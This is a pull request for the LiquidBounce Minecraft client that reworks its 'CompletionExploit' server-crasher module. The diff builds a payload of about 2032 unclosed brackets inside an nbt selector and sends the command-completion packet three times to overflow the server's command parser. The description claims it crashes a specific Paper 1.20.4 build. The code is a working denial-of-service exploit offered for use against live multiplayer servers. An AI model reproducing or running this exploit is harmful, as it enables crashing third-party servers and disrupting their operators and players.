### PR TITLE
Improved CompletionExploit ServerCrasher

### DIFF
--- a/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/CompletionExploit.kt
+++ b/src/main/kotlin/net/ccbluex/liquidbounce/features/module/modules/exploit/servercrasher/exploits/CompletionExploit.kt
@@ -6,6 +6,8 @@ import net.ccbluex.liquidbounce.config.ChoiceConfigurable
 import net.ccbluex.liquidbounce.features.module.modules.exploit.servercrasher.ModuleServerCrasher
 import net.minecraft.network.packet.c2s.play.RequestCommandCompletionsC2SPacket
 import net.ccbluex.liquidbounce.utils.client.logger
+import java.util.stream.Collectors
+import java.util.stream.IntStream
 
 object CompletionExploit : Choice("Completion") {
 
@@ -13,28 +15,28 @@ object CompletionExploit : Choice("Completion") {
         get() = ModuleServerCrasher.exploitChoices
 
     override fun enable() {
-        val overflow = try {
-            //Levels should be configurable from 2200-3500
-            generateJsonObject(3000).toString().replace("\"", "")
-        } catch (e: StackOverflowError) {
-            logger.warn("Failed to generate payload!", e)
-            //Should not happen, server stack is more overloaded reading that.
-            return;
-        }
+        //Made it smaller under 2048, but it still cannot throw stackoverflow every time.
+        val overflow = generateJsonObject(2032);
 
-        // Seemed to work on 1.20.2, 1.20.4 paper/purpur servers, does not anymore.
-        // Latest server builds can kick if partialCommand length is greater than 6144,
+        // Latest server builds can kick if partialCommand length is greater than 2048,
         // probably can be compressed even more.
-        network.sendPacket(RequestCommandCompletionsC2SPacket(0, "msg @a[nbt=$overflow]"))
+        val partialCommand = "msg @a[nbt=$overflow]";
+        repeat(3) {
+            network.sendPacket(RequestCommandCompletionsC2SPacket(0, partialCommand))
+        }
         ModuleServerCrasher.enabled = false
     }
 
-    private fun generateJsonObject(levels: Int): JsonObject {
-        val jsonObject = JsonObject()
-        if (levels > 0) {
-            jsonObject.add("a", generateJsonObject(levels - 1))
-        }
-        return jsonObject
+    private fun generateJsonObject(levels: Int): String {
+        // Brigadier does not check for closing brackets
+        // Until it is too late.
+
+        // Replaced Object with array and removed closing brackets
+        val `in` = IntStream.range(0, levels)
+            .mapToObj { _ -> "[" }
+            .collect(Collectors.joining())
+        val json = "{a:$`in`}"
+        return json;
     }
 
 }


### PR DESCRIPTION
Made it fit into 2048 length limit

Can crash: Paper version git-Paper-343 (MC: 1.20.4) (Implementing API version 1.20.4-R0.1-SNAPSHOT)
Video: https://youtu.be/74m5y_runjA?si=NpVg2nKcDq0k7RZP